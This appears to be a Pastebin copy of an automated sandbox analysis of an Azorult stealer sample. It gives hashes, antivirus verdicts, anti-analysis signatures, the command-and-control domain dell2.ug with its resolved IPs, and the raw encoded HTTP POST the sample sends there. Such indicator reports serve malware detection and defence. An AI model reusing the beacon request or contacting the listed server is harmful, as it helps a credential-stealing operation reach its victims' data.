Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * MalFamily: "Azorult"
- * MalScore: 10.0
- * File Name: "Exes_37cc975a1257bf260308fe30e1d3e7ee.exe"
- * File Size: 233984
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "cbc5c6867c6caeaa956ccf8828d1618422dc87b21fd3a78653a0c601b29533a8"
- * MD5: "37cc975a1257bf260308fe30e1d3e7ee"
- * SHA1: "934dd52f58b4889d94c52a53afb6a44e61422839"
- * SHA512: "5ae462b90109105e1b83a03a9c7d35c0cd81a53a95590b104f6161da6a3ad3eed5551476835fdfae98e0347a8b52dd7de1b443bd5d48d8712900019a34248eb6"
- * CRC32: "E1023269"
- * SSDEEP: "6144:TB7zXtjRsqev8Xzgim10MbZcAFd01DhMy30PyutDi:xzXtjRsqU8DNmpLj01DhPUhi"
- * Process Execution:
- "Njc1G9rPzs.exe"
- * Executed Commands:
- * Signatures Detected:
- "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
- "Details":
- "Description": "Behavioural detection: Executable code extraction",
- "Details":
- "Description": "Possible date expiration check, exits too soon after checking local time",
- "Details":
- "process": "Njc1G9rPzs.exe, PID 2420"
- "Description": "Performs HTTP requests potentially not found in PCAP.",
- "Details":
- "url": "dell2.ug:80//1/index.php"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- "suspicious_request": "http://dell2.ug/1/index.php"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://dell2.ug/1/index.php"
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details":
- "Spam": "Njc1G9rPzs.exe (2420) called API NtQueryInformationThread 3575525 times"
- "Description": "Stack pivoting was detected when using a critical API",
- "Details":
- "process": "Njc1G9rPzs.exe:2420"
- "Description": "CAPE detected the Azorult malware family",
- "Details":
- "Description": "File has been identified by 36 Antiviruses on VirusTotal as malicious",
- "Details":
- "McAfee": "RDN/Generic.grp"
- "K7GW": "Trojan ( 00556bde1 )"
- "Cybereason": "malicious.a1257b"
- "TrendMicro": "Trojan.Win32.SODINOK.SM.hp"
- "F-Prot": "W32/Kryptik.ABS.gen!Eldorado"
- "ESET-NOD32": "a variant of Win32/Kryptik.GVWF"
- "APEX": "Malicious"
- "Paloalto": "generic.ml"
- "GData": "Win32.Trojan-Stealer.Azorult.XA12HC"
- "Kaspersky": "Trojan-PSW.Win32.Azorult.aajh"
- "Alibaba": "TrojanPSW:Win32/Azorult.3c911882"
- "Avast": "Win32:Trojan-gen"
- "Tencent": "Win32.Trojan-qqpass.Qqrob.Lmbk"
- "Endgame": "malicious (high confidence)"
- "Sophos": "Mal/Generic-S"
- "F-Secure": "Trojan.TR/Kryptik.avhqr"
- "Invincea": "heuristic"
- "McAfee-GW-Edition": "BehavesLike.Win32.Rootkit.dh"
- "FireEye": "Generic.mg.37cc975a1257bf26"
- "SentinelOne": "DFI - Suspicious PE"
- "Cyren": "W32/Kryptik.ABS.gen!Eldorado"
- "Webroot": "W32.Malware.gen"
- "Avira": "TR/Kryptik.avhqr"
- "Microsoft": "TrojanSpy:Win32/Banload.AAA!bit"
- "AegisLab": "Trojan.Multi.Generic.4!c"
- "ZoneAlarm": "Trojan-PSW.Win32.Azorult.aajh"
- "AhnLab-V3": "Trojan/Win32.MalPe.C3449305"
- "Acronis": "suspicious"
- "Malwarebytes": "Trojan.MalPack.GS"
- "Rising": "Trojan.Generic@ML.92 (RDMK:JrTuIYbmiz1qmDjjv7tvpw)"
- "Ikarus": "Trojan.Win32.Krypt"
- "Fortinet": "W32/GenKryptik.DRFK!tr"
- "AVG": "Win32:Trojan-gen"
- "Panda": "Trj/GdSda.A"
- "CrowdStrike": "win/malicious_confidence_80% (W)"
- "Qihoo-360": "HEUR/QVM10.2.771F.Malware.Gen"
- "Description": "Collects information to fingerprint the system",
- "Details":
- * Started Service:
- * Mutexes:
- "A81FB8C60-BBE6E186-FC9B5DB5-36DA4559-33946726"
- * Modified Files:
- * Deleted Files:
- * Modified Registry Keys:
- * Deleted Registry Keys:
- * DNS Communications:
- "type": "A",
- "request": "dell2.ug",
- "answers":
- "data": "194.67.90.196",
- "type": "A"
- "data": "149.154.69.146",
- "type": "A"
- "data": "62.109.17.122",
- "type": "A"
- * Domains:
- "ip": "149.154.69.146",
- "domain": "dell2.ug"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 1,
- "body": "\\x00\\x00\\x00&f\\x96&f\\x9fE\\x17\\x8b0m\\xed&f\\x98&f\\x9e&g\\xeaA\\x17\\xeb&f\\x98Fp\\x9d2p\\x9d;p\\x9d5p\\x9cG\\x13\\xed&f\\x97Ap\\x9d6\\x11\\xec&f\\x9b&g\\xea&f\\x9d&f\\x98G\\x14\\x8b0a\\x8b0`\\x8b0`\\x8b0l\\x8b1\\x11\\x8b0f\\x8b0f\\x8b0l\\x8b0a\\x8b0c\\x8b0b\\x8b0g\\x8b0c",
- "uri": "http://dell2.ug/1/index.php",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
- "method": "POST",
- "host": "dell2.ug",
- "version": "1.1",
- "path": "/1/index.php",
- "data": "POST /1/index.php HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nHost: dell2.ug\r\nContent-Length: 107\r\nCache-Control: no-cache\r\n\r\n\\x00\\x00\\x00&f\\x96&f\\x9fE\\x17\\x8b0m\\xed&f\\x98&f\\x9e&g\\xeaA\\x17\\xeb&f\\x98Fp\\x9d2p\\x9d;p\\x9d5p\\x9cG\\x13\\xed&f\\x97Ap\\x9d6\\x11\\xec&f\\x9b&g\\xea&f\\x9d&f\\x98G\\x14\\x8b0a\\x8b0`\\x8b0`\\x8b0l\\x8b1\\x11\\x8b0f\\x8b0f\\x8b0l\\x8b0a\\x8b0c\\x8b0b\\x8b0g\\x8b0c",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- "country_name": "Russian Federation",
- "ip": "149.154.69.146",
- "inaddrarpa": "",
- "hostname": "dell2.ug"
- * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement